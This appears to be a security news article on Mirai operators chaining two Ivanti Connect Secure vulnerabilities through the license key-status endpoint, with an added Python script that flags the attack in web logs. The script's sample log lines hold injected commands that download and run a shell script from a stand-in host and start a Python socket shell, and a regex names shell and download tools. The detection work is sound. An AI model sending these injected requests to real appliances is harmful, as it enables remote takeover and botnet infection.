Mirai Botnet Exploits Ivanti Connect Secure Vulnerabilities

May 9, 2024

Juniper Threat Labs has reported that unidentified threat actors are exploiting recently disclosed vulnerabilities in Ivanti Connect Secure (ICS) to deliver the Mirai botnet payload. Ivanti had earlier disclosed that two zero-day vulnerabilities (CVE-2023-46805 and CVE-2024-21887) in Connect Secure and Policy Secure were being exploited in the wild to execute arbitrary commands remotely on targeted gateways.

The first vulnerability, CVE-2023-46805 (CVSS 8.2), is an authentication bypass in the web component of Ivanti ICS 9.x and 22.x and Ivanti Policy Secure. A remote attacker can trigger it to reach restricted resources without passing the normal control checks.

The second flaw, CVE-2024-21887 (CVSS 9.1), is a command injection vulnerability in the web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure. On its own it requires an authenticated administrator, who can exploit it by sending specially crafted requests to execute arbitrary commands on the appliance.

Ivanti's advisory states, “If CVE-2024-21887 is used in conjunction with CVE-2023-46805, exploitation does not require authentication and enables a threat actor to craft malicious requests and execute arbitrary commands on the system.”

Juniper Threat Labs researchers have observed threat actors using the CVE-2023-46805 bypass to reach the endpoint “/api/v1/license/key-status/;” without authenticating, then using the command injection flaw to supply their payload. The semicolon that terminates the path is the shell command separator the injection depends on: whatever follows it is executed on the appliance.

The researchers have noted instances where attackers exploited this chain to launch both curl-based and Python-based reverse shells, giving them control of the vulnerable appliances. They have also seen Mirai payloads delivered through shell scripts fetched and executed by the injected command.
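The following is an added detection example, not code from the article or from Juniper Threat Labs. It parses a handful of constructed web access log lines (combined log format is assumed; a real ICS appliance may log differently) and flags requests that match the chain described above: path traversal into the “/api/v1/license/key-status/” endpoint and a `;` command separator in the path, optionally followed by a download or shell tool. The log lines, IP addresses and commands are all constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Combined log format (assumption: the appliance may use a different layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Endpoint named in the article; attackers append ';<command>' to its path.
LICENSE_ENDPOINT = "/api/v1/license/key-status"

# Constructed sample lines (not real traffic, not from the report).
SAMPLE_LOGS = [
    '203.0.113.5 - - [09/May/2024:10:00:01 +0000] '
    '"GET /api/v1/license/key-status/;curl%20http://198.51.100.9/x.sh%7Csh HTTP/1.1" '
    '200 12 "-" "curl/7.88"',
    '198.51.100.20 - - [09/May/2024:10:00:02 +0000] '
    '"GET /api/v1/totp/user-backup-code/../../license/key-status/;python%20-c%20import%20socket HTTP/1.1" '
    '200 12 "-" "python-requests/2.31"',
    '192.0.2.7 - - [09/May/2024:10:00:03 +0000] '
    '"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.8 - - [09/May/2024:10:00:04 +0000] '
    '"GET /api/v1/license/key-status HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]


def indicators(raw_path: str) -> list[str]:
    """Return the suspicious features of a request path (empty list if none)."""
    # Decode percent-encoding and drop the query string before inspecting.
    path = unquote(raw_path).split("?", 1)[0]
    # Collapse '..' segments to see which endpoint the request really lands on.
    norm = posixpath.normpath(path)
    found = []
    if "/../" in path:
        found.append("traversal")          # bypass style of CVE-2023-46805
    if norm.startswith(LICENSE_ENDPOINT):
        found.append("license-endpoint")   # the endpoint named in the article
    if path.startswith("/api/v1/") and ";" in path:
        found.append("command-separator")  # injection style of CVE-2024-21887
        cmd = path.split(";", 1)[1]        # everything after ';' is the injected command
        if re.search(r"\b(curl|wget|python\d?|sh|bash|nc)\b", cmd):
            found.append("fetch-or-shell")
    return found


def scan(lines):
    """Parse log lines and return the requests that look like the exploit chain."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        inds = indicators(m["path"])
        if "command-separator" in inds or "traversal" in inds:
            hits.append({
                "ip": m["ip"],
                "path": unquote(m["path"]),
                "indicators": inds,
                "ua": m["ua"],
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["ip"], hit["indicators"], hit["path"])
```

A direct, unauthenticated request to the license endpoint with no `;` (the last sample line) is recorded only as `license-endpoint` and is not reported, since the appliance should reject it; the traversal and separator indicators are what distinguish the exploit chain.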

The researchers analyzed the payloads and identified them as Mirai bots. They warn that the growing volume of attempts against the authentication bypass and remote code execution flaws in Ivanti Connect Secure (formerly Pulse Secure) is a significant threat to network security. Mirai arriving through these exploits shows how quickly a disclosed appliance vulnerability is absorbed into commodity botnet tooling, and it is reasonable to expect other malware, including ransomware, to be deployed through the same chain. Understanding how the two flaws are combined, and what is delivered once the command injection succeeds, is what allows defenders to recognize and block these attacks.
